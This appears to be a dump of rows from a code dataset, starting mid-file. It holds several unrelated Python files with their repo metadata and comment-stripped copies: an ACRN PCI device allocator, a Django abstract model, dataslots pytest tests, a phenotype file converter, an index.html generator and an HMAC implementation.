def insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used):
    """Allocate a free bdf for each ivshmem region attached to this VM."""
    shmem_regions = lib.lib.get_shmem_regions(scenario_etree)
    if vm_id not in shmem_regions:
        return
    for shm in shmem_regions[vm_id].values():
        free_bdf = find_unused_bdf(used)
        devdict[f"{IVSHMEM}_{shm.get('id')}"] = free_bdf
        used.append(free_bdf)
def insert_pt_devs_to_dev_dict(vm_node_etree, devdict, used):
    """
    Assign a bdf to each of this VM's passthrough devices.

    Devices listed in HARDCODED_BDF_LIST keep their native bdf (their drivers
    hardcode it); every other passthrough device receives an unused bdf from
    find_unused_bdf().
    """
    pt_devs = vm_node_etree.xpath(f".//pci_dev/text()")
    # First pass: keep the native bdf for devices in HARDCODED_BDF_LIST.
    for pt_dev in pt_devs:
        bdf_string = pt_dev.split()[0]
        if bdf_string in HARDCODED_BDF_LIST:
            bdf = BusDevFunc.from_str(bdf_string)
            dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
            devdict[dev_name] = bdf
            used.append(bdf)
    # Drop the devices already handled above. Bug fix: the previous code
    # filtered on the stale loop variable `bdf_string` (the *last* device of
    # the loop above), so the filter compared every device against one fixed
    # bdf; each device must be tested against its own bdf instead.
    pt_devs = [pt_dev for pt_dev in pt_devs
               if BusDevFunc.from_str(pt_dev.split()[0]) not in used]
    # Second pass: allocate an unused bdf for each remaining device; the
    # device name still encodes its native (physical) bdf.
    for pt_dev in pt_devs:
        bdf = BusDevFunc.from_str(pt_dev.split()[0])
        free_bdf = find_unused_bdf(used)
        dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
        devdict[dev_name] = free_bdf
        used.append(free_bdf)
def get_devs_bdf_native(board_etree):
    """
    Get all pci devices' bdf in native environment.
    return: list of pci devices' bdf
    """
    dev_list = []
    for node in board_etree.xpath("//bus[@type = 'pci' and @id]/device[@address]"):
        # The device address packs dev in the high 16 bits, func in the low 16;
        # the bus number comes from the parent <bus> element.
        raw_address = int(node.get('address'), 16)
        parent_bus = int(common.get_node("../@address", node), 16)
        dev_list.append(BusDevFunc(bus=parent_bus,
                                   dev=raw_address >> 16,
                                   func=raw_address & 0xffff))
    return dev_list
def get_devs_bdf_passthrough(scenario_etree):
    """
    Get all pre-launched vms' passthrough devices' bdf in native environment.
    return: list of passthrough devices' bdf.
    """
    bdf_list = []
    for vm_type in lib.lib.PRE_LAUNCHED_VMS_TYPE:
        for pt_dev in scenario_etree.xpath(f"//vm[vm_type = '{vm_type}']/pci_devs/pci_dev/text()"):
            # The bdf is the first whitespace-separated token of the entry.
            bdf_list.append(BusDevFunc.from_str(pt_dev.split()[0]))
    return bdf_list
def create_device_node(allocation_etree, vm_id, devdict):
    """Write each allocated bdf under <vm id=...>/<device> in allocation_etree."""
    for dev_name, bdf in devdict.items():
        vm_node = common.get_node(f"/acrn-config/vm[@id = '{vm_id}']", allocation_etree)
        if vm_node is None:
            vm_node = common.append_node("/acrn-config/vm", None, allocation_etree, id = vm_id)
        dev_node = common.get_node(f"./device[@name = '{dev_name}']", vm_node)
        if dev_node is None:
            dev_node = common.append_node("./device", None, vm_node, name = dev_name)
        # Emit bus/dev/func as upper-case hex (e.g. "0X05"), skipping any
        # component that is already present.
        for tag, number in (("bus", bdf.bus), ("dev", bdf.dev), ("func", bdf.func)):
            if common.get_node(f"./{tag}", dev_node) is None:
                common.append_node(f"./{tag}", f"{number:#04x}".upper(), dev_node)
def fn(board_etree, scenario_etree, allocation_etree):
    """Allocator entry point: assign device bdfs for every non-post-launched
    VM in the scenario and record them in allocation_etree."""
    vm_nodes = scenario_etree.xpath("//vm")
    for vm_node in vm_nodes:
        vm_id = vm_node.get('id')
        devdict = {}  # device name -> allocated BusDevFunc
        used = []     # bdfs already occupied on the VM's virtual bus
        vm_type = common.get_node("./vm_type/text()", vm_node)
        # Post-launched VMs are skipped entirely here.
        if vm_type is not None and lib.lib.is_post_launched_vm(vm_type):
            continue
        # For the service VM, every native bdf that is not passed through to
        # another VM stays visible and therefore counts as occupied.
        if vm_type is not None and lib.lib.is_sos_vm(vm_type):
            native_used = get_devs_bdf_native(board_etree)
            passthrough_used = get_devs_bdf_passthrough(scenario_etree)
            used = [bdf for bdf in native_used if bdf not in passthrough_used]
        # NOTE(review): board-specific quirk — 00:01.0 is reserved on tgl-rvp;
        # confirm against that board's PCI layout.
        if common.get_node("//@board", scenario_etree) == "tgl-rvp":
            used.append(BusDevFunc(bus = 0, dev = 1, func = 0))
        insert_vuart_to_dev_dict(vm_node, devdict, used)
        insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used)
        insert_pt_devs_to_dev_dict(vm_node, devdict, used)
        create_device_node(allocation_etree, vm_id, devdict)
hivs_utils/abstract_models.py | tehamalab/hivs | 0 | 6612358 | <filename>hivs_utils/abstract_models.py
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractChoice(models.Model):
    """Abstract base model for simple name/code lookup ("choice") tables."""
    # Human-readable label; unique, so it can serve as a natural key.
    name = models.CharField(_('name'), max_length=255, unique=True)
    # Optional short machine-friendly code.
    code = models.CharField(_('code'), max_length=25, blank=True)
    # Set once when the row is created (auto_now_add).
    timestamp = models.DateTimeField('created', auto_now_add=True)
    # Refreshed on every save (auto_now).
    last_modified = models.DateTimeField(
        _('last modified'),
        auto_now=True,
        null=True,
        blank=True
    )
    class Meta:
        abstract = True
    def __str__(self):
        return self.name
| <filename>hivs_utils/abstract_models.py
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractChoice(models.Model):
name = models.CharField(_('name'), max_length=255, unique=True)
code = models.CharField(_('code'), max_length=25, blank=True)
timestamp = models.DateTimeField('created', auto_now_add=True)
last_modified = models.DateTimeField(
_('last modified'),
auto_now=True,
null=True,
blank=True
)
class Meta:
abstract = True
def __str__(self):
return self.name
| none | 1 | 2.372501 | 2 | |
tests/test_dataslots.py | starhel/dataslots | 19 | 6612359 | import inspect
import platform
import sys
import weakref
from dataclasses import dataclass, field, InitVar
from typing import ClassVar, TypeVar, Generic
import pytest
from dataslots import dataslots, with_slots
def test_basic_slots(assertions):
@dataslots
@dataclass
class A:
x: int
y: float = 0.0
l: list = field(default_factory=list)
instance = A(10)
assertions.assert_slots(instance, ('x', 'y', 'l'))
assertions.assert_not_member('__dict__', instance)
assertions.assert_not_member('__weakref__', instance)
with pytest.raises(AttributeError):
instance.new_prop = 15
def test_skip_init_var(assertions):
@dataslots
@dataclass
class A:
x: int
y: InitVar[int]
def __post_init__(self, y: int):
self.x += y
assertions.assert_slots(A, ('x',))
def test_base_methods_present(assertions):
@dataslots
@dataclass(frozen=True)
class A:
x: int = 15
instance = A()
assertions.assert_member('__init__', instance)
assertions.assert_member('__eq__', instance)
assertions.assert_member('__ge__', instance)
assertions.assert_member('__repr__', instance)
assertions.assert_member('__hash__', instance)
def test_inheritance_no_dict(assertions):
@dataslots
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
assertions.assert_not_member('__dict__', Base(5))
assertions.assert_not_member('__dict__', Derived(5, 10))
def test_inheritance_base_class_without_slots(assertions):
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
derived = Derived(5, 10)
assertions.assert_member('__dict__', Base(5))
assertions.assert_member('__dict__', derived)
assertions.assert_slots(Derived, ('x', 'y'))
assertions.assert_assign_variable(derived)
def test_slots_and_dict(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
instance = A(10)
assertions.assert_member('__slots__', instance)
assertions.assert_member('__dict__', instance)
assertions.assert_assign_variable(instance)
@pytest.mark.skipif(platform.python_implementation() == 'PyPy',
reason="PyPy can create weakref without __weakref__ attribute.")
def test_cannot_create_weakref():
@dataslots
@dataclass
class A:
x: int
instance = A(1)
with pytest.raises(TypeError):
weakref.ref(instance)
def test_no_weakref_attr(assertions):
@dataslots
@dataclass
class A:
x: int
instance = A(1)
assertions.assert_not_member('__weakref__', instance)
def test_weakref_flag():
@dataslots(add_weakref=True)
@dataclass
class A:
x: int
instance = A(1)
r = weakref.ref(instance)
assert instance is r()
def test_read_only_variable():
@dataslots
@dataclass
class A:
x: int
y = 5
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
def test_read_only_variable_class_var():
@dataslots
@dataclass
class A:
x: int
y: ClassVar[int] = 5
z: ClassVar[set] = set()
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
b = A(5)
a.z.add(10)
assert a.z == b.z
assert a.z is b.z
def test_check_docs():
@dataslots
@dataclass
class A:
"""Some class with one attribute"""
x: int
assert A.__doc__ == "Some class with one attribute"
def test_qualname():
@dataslots
@dataclass
class A:
x: int
qualname = f'{inspect.currentframe().f_code.co_name}.<locals>.A'
assert A.__qualname__ == qualname
def test_slots_inheritance(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int = 15
@dataslots
@dataclass
class C(B):
x: int = 20
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_multi_add_dict_weakref(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class B(A):
y: int = 15
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class C(B):
x: int = 20
z: int = 50
assertions.assert_slots(A, ('x', '__dict__'))
assertions.assert_slots(B, ('y', '__weakref__'))
assertions.assert_slots(C, ('z',))
def test_slots_inheritance_no_defaults(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int
@dataslots
@dataclass
class C(B):
x: int
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_with_slots_deprecated():
@dataclass
class A:
x: int
pytest.deprecated_call(with_slots, A)
def test_custom_metaclass():
class MetaA(type):
pass
@dataslots
@dataclass
class A(metaclass=MetaA):
x: int
assert type(A) is MetaA
@pytest.mark.skipif(sys.version_info < (3, 7, 0), reason="Generic[T] is not supported in python 3.6")
def test_generic_typing(assertions):
T = TypeVar('T', int, float)
@dataslots
@dataclass
class A(Generic[T]):
x: T
y: T = 10
instance = A[int](x=5)
assertions.assert_slots(A, ('x', 'y'))
assert 10 == instance.y
assertions.assert_not_member('__dict__', instance)
def test_slots_already_defined():
@dataclass
class A:
__slots__ = ('x', 'y')
x: int
y: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('do not define __slots__ if dataslots decorator is used')
def test_dataslots_used_without_dataclass():
class A:
x: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('dataslots can be used only with dataclass')
| import inspect
import platform
import sys
import weakref
from dataclasses import dataclass, field, InitVar
from typing import ClassVar, TypeVar, Generic
import pytest
from dataslots import dataslots, with_slots
def test_basic_slots(assertions):
@dataslots
@dataclass
class A:
x: int
y: float = 0.0
l: list = field(default_factory=list)
instance = A(10)
assertions.assert_slots(instance, ('x', 'y', 'l'))
assertions.assert_not_member('__dict__', instance)
assertions.assert_not_member('__weakref__', instance)
with pytest.raises(AttributeError):
instance.new_prop = 15
def test_skip_init_var(assertions):
@dataslots
@dataclass
class A:
x: int
y: InitVar[int]
def __post_init__(self, y: int):
self.x += y
assertions.assert_slots(A, ('x',))
def test_base_methods_present(assertions):
@dataslots
@dataclass(frozen=True)
class A:
x: int = 15
instance = A()
assertions.assert_member('__init__', instance)
assertions.assert_member('__eq__', instance)
assertions.assert_member('__ge__', instance)
assertions.assert_member('__repr__', instance)
assertions.assert_member('__hash__', instance)
def test_inheritance_no_dict(assertions):
@dataslots
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
assertions.assert_not_member('__dict__', Base(5))
assertions.assert_not_member('__dict__', Derived(5, 10))
def test_inheritance_base_class_without_slots(assertions):
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
derived = Derived(5, 10)
assertions.assert_member('__dict__', Base(5))
assertions.assert_member('__dict__', derived)
assertions.assert_slots(Derived, ('x', 'y'))
assertions.assert_assign_variable(derived)
def test_slots_and_dict(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
instance = A(10)
assertions.assert_member('__slots__', instance)
assertions.assert_member('__dict__', instance)
assertions.assert_assign_variable(instance)
@pytest.mark.skipif(platform.python_implementation() == 'PyPy',
reason="PyPy can create weakref without __weakref__ attribute.")
def test_cannot_create_weakref():
@dataslots
@dataclass
class A:
x: int
instance = A(1)
with pytest.raises(TypeError):
weakref.ref(instance)
def test_no_weakref_attr(assertions):
@dataslots
@dataclass
class A:
x: int
instance = A(1)
assertions.assert_not_member('__weakref__', instance)
def test_weakref_flag():
@dataslots(add_weakref=True)
@dataclass
class A:
x: int
instance = A(1)
r = weakref.ref(instance)
assert instance is r()
def test_read_only_variable():
@dataslots
@dataclass
class A:
x: int
y = 5
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
def test_read_only_variable_class_var():
@dataslots
@dataclass
class A:
x: int
y: ClassVar[int] = 5
z: ClassVar[set] = set()
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
b = A(5)
a.z.add(10)
assert a.z == b.z
assert a.z is b.z
def test_check_docs():
@dataslots
@dataclass
class A:
"""Some class with one attribute"""
x: int
assert A.__doc__ == "Some class with one attribute"
def test_qualname():
@dataslots
@dataclass
class A:
x: int
qualname = f'{inspect.currentframe().f_code.co_name}.<locals>.A'
assert A.__qualname__ == qualname
def test_slots_inheritance(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int = 15
@dataslots
@dataclass
class C(B):
x: int = 20
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_multi_add_dict_weakref(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class B(A):
y: int = 15
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class C(B):
x: int = 20
z: int = 50
assertions.assert_slots(A, ('x', '__dict__'))
assertions.assert_slots(B, ('y', '__weakref__'))
assertions.assert_slots(C, ('z',))
def test_slots_inheritance_no_defaults(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int
@dataslots
@dataclass
class C(B):
x: int
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_with_slots_deprecated():
@dataclass
class A:
x: int
pytest.deprecated_call(with_slots, A)
def test_custom_metaclass():
class MetaA(type):
pass
@dataslots
@dataclass
class A(metaclass=MetaA):
x: int
assert type(A) is MetaA
@pytest.mark.skipif(sys.version_info < (3, 7, 0), reason="Generic[T] is not supported in python 3.6")
def test_generic_typing(assertions):
T = TypeVar('T', int, float)
@dataslots
@dataclass
class A(Generic[T]):
x: T
y: T = 10
instance = A[int](x=5)
assertions.assert_slots(A, ('x', 'y'))
assert 10 == instance.y
assertions.assert_not_member('__dict__', instance)
def test_slots_already_defined():
@dataclass
class A:
__slots__ = ('x', 'y')
x: int
y: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('do not define __slots__ if dataslots decorator is used')
def test_dataslots_used_without_dataclass():
class A:
x: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('dataslots can be used only with dataclass')
| en | 0.874776 | Some class with one attribute | 2.265652 | 2 |
methods/heritability/parquet2pheno.py | liangyy/ukb_idp_genetic_arch | 0 | 6612360 | def write_pheno(df, fn):
with open(fn, 'w') as f:
for i, p in zip(df.indiv.to_list(), df.pheno.to_list()):
f.write(f'{i}\t{i}\t{p}\n')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(prog='parquet2pheno.py', description='''
Read parquet file and generate the gcta pheno file.
''')
parser.add_argument('--input', help='''
Input parquet format.
''')
parser.add_argument('--pheno_col', help='''
Column name of the phenotype of interest.
''')
parser.add_argument('--indiv_col', help='''
Column name of the individual ID.
''')
parser.add_argument('--output', help='''
Output file name.
''')
args = parser.parse_args()
import logging, time, sys, os
# configing util
logging.basicConfig(
level = logging.INFO,
stream = sys.stderr,
format = '%(asctime)s %(message)s',
datefmt = '%Y-%m-%d %I:%M:%S %p'
)
import pandas as pd
logging.info('Loading phenotypes.')
df = pd.read_parquet(args.input, columns=[args.indiv_col, args.pheno_col])
df.rename(columns={args.indiv_col: 'indiv', args.pheno_col: 'pheno'}, inplace=True)
logging.info('Writing to disk.')
write_pheno(df, args.output)
| def write_pheno(df, fn):
with open(fn, 'w') as f:
for i, p in zip(df.indiv.to_list(), df.pheno.to_list()):
f.write(f'{i}\t{i}\t{p}\n')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(prog='parquet2pheno.py', description='''
Read parquet file and generate the gcta pheno file.
''')
parser.add_argument('--input', help='''
Input parquet format.
''')
parser.add_argument('--pheno_col', help='''
Column name of the phenotype of interest.
''')
parser.add_argument('--indiv_col', help='''
Column name of the individual ID.
''')
parser.add_argument('--output', help='''
Output file name.
''')
args = parser.parse_args()
import logging, time, sys, os
# configing util
logging.basicConfig(
level = logging.INFO,
stream = sys.stderr,
format = '%(asctime)s %(message)s',
datefmt = '%Y-%m-%d %I:%M:%S %p'
)
import pandas as pd
logging.info('Loading phenotypes.')
df = pd.read_parquet(args.input, columns=[args.indiv_col, args.pheno_col])
df.rename(columns={args.indiv_col: 'indiv', args.pheno_col: 'pheno'}, inplace=True)
logging.info('Writing to disk.')
write_pheno(df, args.output)
| en | 0.647164 | Read parquet file and generate the gcta pheno file. Input parquet format. Column name of the phenotype of interest. Column name of the individual ID. Output file name. # configing util | 2.790579 | 3 |
update.py | sitius2/python-hindex | 0 | 6612361 | <reponame>sitius2/python-hindex
#!/usr/bin/env python3
import os
import re
import argparse
VERSION = "1.6"
parser = argparse.ArgumentParser(description="Generate index.html from the files in the given directory,"
" if no directory is specified,"" use the current one", )
parser.add_argument("-e", "--exclude", nargs=1, help="A file that contains names of files and directories "
"that shall be excluded in the index.html", default=None)
parser.add_argument("-t", "--title", nargs=1, help="Sets the title tag of the index.html", default="Server")
parser.add_argument("-h1", "--headline-files", nargs=1, help="Headline for the downloadable files section",
metavar="HEADLINE", default="Downloadable files")
parser.add_argument("-h2", "--headline-directories", nargs=1, help="Headline for the browseable"
"directories section", metavar="HEADLINE", default="Browseable directories")
parser.add_argument("-c", "--charset", nargs=1, help="Specify the charset that should be used in the meta tag",
default="utf-8")
parser.add_argument("-l", "--list-type", nargs=1, help="Specify the list type that should be use (default: 'ul'",
default="ul")
parser.add_argument("path", help="Path of which the index.html shall be created", default=os.getcwd())
parser.add_argument("-i", "--interactive", help="Enter interactive console mode", action="store_true")
parser.add_argument("-v", "--version", help="Print program version", action="version", version=VERSION)
args = parser.parse_args()
# if len(sys.argv) > 1:
# for arg in range(len(sys.argv)):
# if sys.argv[arg][:1] != "-" and arg != len(sys.argv):
# continue
# elif arg == "-e":
# exclude_file = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-t":
# page_title = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h1":
# file_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h2":
# dirs_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-c":
# html_charset = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-l":
# html_list_type = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# else:
# if os.path.exists(sys.argv[arg]) and sys.argv[arg] != "":
# work_path = sys.argv[arg]
# else:
# print("ERROR: Path does not exist...")
# print(HELP_MSG)
# sys.exit(1)
# else:
# work_path = os.getcwd()
class HtmlFileCreator:
def __init__(self, path=args.path, title=args.title, charset=args.charset, headline_files=args.headline_files,
headline_directories=args.headline_directories, list_type=args.list_type):
self._path = "".join(path)
self._title = "".join(title)
self._charset = "".join(charset)
self._headline_files = "".join(headline_files)
self._headline_directories = "".join(headline_directories)
self._list_type = "".join(list_type)
_content = []
_files = []
_files_list = []
_files_html = ""
_dirs = []
_dirs_list = []
_dirs_html = ""
_extension_pattern = r"\.[^.]+"
_html_preset = ""
def get_content(self):
self._content = os.listdir(self._path)
counter = len(exclude_files)
iteration = 0
while iteration <= counter:
for x in self._content:
for y in exclude_files:
if x == y:
self._content.remove(x)
iteration += 1
def sort_content(self):
for item in self._content:
if os.path.isdir(item):
self._dirs.append(item)
elif os.path.isfile(item):
self._files.append(item)
else:
continue
def create_html_page(self):
self._html_preset = """<!DOCTYPE html />
<html>
<head>
<title> """ + self._title + """</title>
<meta charset=\"""" + self._charset + """\" />
</head>
<body>
<h1>""" + self._headline_files + """</h1>
<""" + self._list_type + """>
""" + self._files_html.join(str(x) for x in self._files_list) + """
</""" + self._list_type + """>
<h1>""" + self._headline_directories + """</h1>
<""" + self._list_type + """>
""" + self._dirs_html.join(str(x) for x in self._dirs_list) + """
</""" + self._list_type + """>
</body>
</html>"""
def create_index_list(self):
for item in self._dirs:
self._dirs_list.append('<li><a href="{}">{}</a></li>\n'.format(item, item))
for item in self._files:
desc = re.search(self._extension_pattern, item)
if desc is not None:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'
.format(item, item.replace(desc.group(), "")))
else:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'.format(item, item))
def create_index_html(self):
if os.path.exists("index.html"):
try:
with open("index.html", "w") as indexf:
indexf.seek(0)
indexf.truncate()
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
else:
try:
with open("index.html", "x") as indexf:
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
exclude_files = []
if args.exclude is not None:
exclude_list = "".join(str(x) for x in args.exclude)
if os.path.exists(exclude_list):
try:
f = open(exclude_list, "r")
except PermissionError:
print("Can't open exclude file, maybe try running as root?")
import sys
sys.exit(1)
lines = f.readlines()
for line in lines:
exclude_files.append(line.rstrip())
f.close()
else:
print("Exclude file does not exist")
PageGen = HtmlFileCreator()
print("Getting files of directory...")
PageGen.get_content()
print("Sorting files and directories...")
PageGen.sort_content()
print("Creating index list...")
PageGen.create_index_list()
print("Creating page content...")
PageGen.create_html_page()
print("Creating index.html...")
PageGen.create_index_html()
print("Done!")
| #!/usr/bin/env python3
import os
import re
import argparse
VERSION = "1.6"
parser = argparse.ArgumentParser(description="Generate index.html from the files in the given directory,"
" if no directory is specified,"" use the current one", )
parser.add_argument("-e", "--exclude", nargs=1, help="A file that contains names of files and directories "
"that shall be excluded in the index.html", default=None)
parser.add_argument("-t", "--title", nargs=1, help="Sets the title tag of the index.html", default="Server")
parser.add_argument("-h1", "--headline-files", nargs=1, help="Headline for the downloadable files section",
metavar="HEADLINE", default="Downloadable files")
parser.add_argument("-h2", "--headline-directories", nargs=1, help="Headline for the browseable"
"directories section", metavar="HEADLINE", default="Browseable directories")
parser.add_argument("-c", "--charset", nargs=1, help="Specify the charset that should be used in the meta tag",
default="utf-8")
parser.add_argument("-l", "--list-type", nargs=1, help="Specify the list type that should be use (default: 'ul'",
default="ul")
parser.add_argument("path", help="Path of which the index.html shall be created", default=os.getcwd())
parser.add_argument("-i", "--interactive", help="Enter interactive console mode", action="store_true")
parser.add_argument("-v", "--version", help="Print program version", action="version", version=VERSION)
args = parser.parse_args()
# if len(sys.argv) > 1:
# for arg in range(len(sys.argv)):
# if sys.argv[arg][:1] != "-" and arg != len(sys.argv):
# continue
# elif arg == "-e":
# exclude_file = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-t":
# page_title = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h1":
# file_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h2":
# dirs_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-c":
# html_charset = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-l":
# html_list_type = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# else:
# if os.path.exists(sys.argv[arg]) and sys.argv[arg] != "":
# work_path = sys.argv[arg]
# else:
# print("ERROR: Path does not exist...")
# print(HELP_MSG)
# sys.exit(1)
# else:
# work_path = os.getcwd()
class HtmlFileCreator:
def __init__(self, path=args.path, title=args.title, charset=args.charset, headline_files=args.headline_files,
headline_directories=args.headline_directories, list_type=args.list_type):
self._path = "".join(path)
self._title = "".join(title)
self._charset = "".join(charset)
self._headline_files = "".join(headline_files)
self._headline_directories = "".join(headline_directories)
self._list_type = "".join(list_type)
_content = []
_files = []
_files_list = []
_files_html = ""
_dirs = []
_dirs_list = []
_dirs_html = ""
_extension_pattern = r"\.[^.]+"
_html_preset = ""
def get_content(self):
self._content = os.listdir(self._path)
counter = len(exclude_files)
iteration = 0
while iteration <= counter:
for x in self._content:
for y in exclude_files:
if x == y:
self._content.remove(x)
iteration += 1
def sort_content(self):
for item in self._content:
if os.path.isdir(item):
self._dirs.append(item)
elif os.path.isfile(item):
self._files.append(item)
else:
continue
def create_html_page(self):
self._html_preset = """<!DOCTYPE html />
<html>
<head>
<title> """ + self._title + """</title>
<meta charset=\"""" + self._charset + """\" />
</head>
<body>
<h1>""" + self._headline_files + """</h1>
<""" + self._list_type + """>
""" + self._files_html.join(str(x) for x in self._files_list) + """
</""" + self._list_type + """>
<h1>""" + self._headline_directories + """</h1>
<""" + self._list_type + """>
""" + self._dirs_html.join(str(x) for x in self._dirs_list) + """
</""" + self._list_type + """>
</body>
</html>"""
def create_index_list(self):
for item in self._dirs:
self._dirs_list.append('<li><a href="{}">{}</a></li>\n'.format(item, item))
for item in self._files:
desc = re.search(self._extension_pattern, item)
if desc is not None:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'
.format(item, item.replace(desc.group(), "")))
else:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'.format(item, item))
def create_index_html(self):
if os.path.exists("index.html"):
try:
with open("index.html", "w") as indexf:
indexf.seek(0)
indexf.truncate()
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
else:
try:
with open("index.html", "x") as indexf:
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
exclude_files = []
if args.exclude is not None:
exclude_list = "".join(str(x) for x in args.exclude)
if os.path.exists(exclude_list):
try:
f = open(exclude_list, "r")
except PermissionError:
print("Can't open exclude file, maybe try running as root?")
import sys
sys.exit(1)
lines = f.readlines()
for line in lines:
exclude_files.append(line.rstrip())
f.close()
else:
print("Exclude file does not exist")
PageGen = HtmlFileCreator()
print("Getting files of directory...")
PageGen.get_content()
print("Sorting files and directories...")
PageGen.sort_content()
print("Creating index list...")
PageGen.create_index_list()
print("Creating page content...")
PageGen.create_html_page()
print("Creating index.html...")
PageGen.create_index_html()
print("Done!") | en | 0.193869 | #!/usr/bin/env python3 # if len(sys.argv) > 1: # for arg in range(len(sys.argv)): # if sys.argv[arg][:1] != "-" and arg != len(sys.argv): # continue # elif arg == "-e": # exclude_file = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-t": # page_title = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-h1": # file_headline = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-h2": # dirs_headline = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-c": # html_charset = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-l": # html_list_type = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # else: # if os.path.exists(sys.argv[arg]) and sys.argv[arg] != "": # work_path = sys.argv[arg] # else: # print("ERROR: Path does not exist...") # print(HELP_MSG) # sys.exit(1) # else: # work_path = os.getcwd() <!DOCTYPE html /> <html> <head> <title> </title> <meta charset=\ \" /> </head> <body> <h1> </h1> < > </ > <h1> </h1> < > </ > </body> </html> | 2.99875 | 3 |
MyCrypto/hash/hmac.py | hiyouga/cryptography-experiment | 8 | 6612362 | <filename>MyCrypto/hash/hmac.py
import sys
sys.path.append("../..")
import hmac
from MyCrypto.utils.bitarray import bitarray
from MyCrypto.hash.sha_utils import Digest
from MyCrypto.hash.sha1 import SHA1
from MyCrypto.hash.sha3 import SHA3_512
class HMAC:
def __init__(self, hash_func:callable):
self._hash_func = hash_func
self._n = hash_func.digest_size * 8
self._b = hash_func.hmac_size
self._ipad = bitarray.concat([bitarray(0x36, 8)]*(self._b//8))
self._opad = bitarray.concat([bitarray(0x5C, 8)]*(self._b//8))
def __call__(self, key:bytes, data:bytes) -> bytes:
# padding key
if len(key) > self._b//8:
key = self._hash_func(key).digest
key = bitarray.from_bytes(key)
k = bitarray.concat((key, bitarray(0, self._b-len(key))))
# process data
data = bitarray.from_bytes(data)
si = k ^ self._ipad
data = bitarray.concat((si, data))
data = self._hash(data)
so = k ^ self._opad
data = bitarray.concat((so, data))
data = self._hash(data)
return Digest(data.to_bytes())
def _hash(self, data:bitarray) -> bitarray:
data = self._hash_func(data.to_bytes()).digest
return bitarray.from_bytes(data)
if __name__ == '__main__':
message = b'The quick brown fox jumps over the lazy dog'
key = b'key'
stdsha1hmac = hmac.new(key, message, digestmod='sha1')
mysha1hmac = HMAC(SHA1())
print(stdsha1hmac.hexdigest())
print(mysha1hmac(key, message).hexdigest)
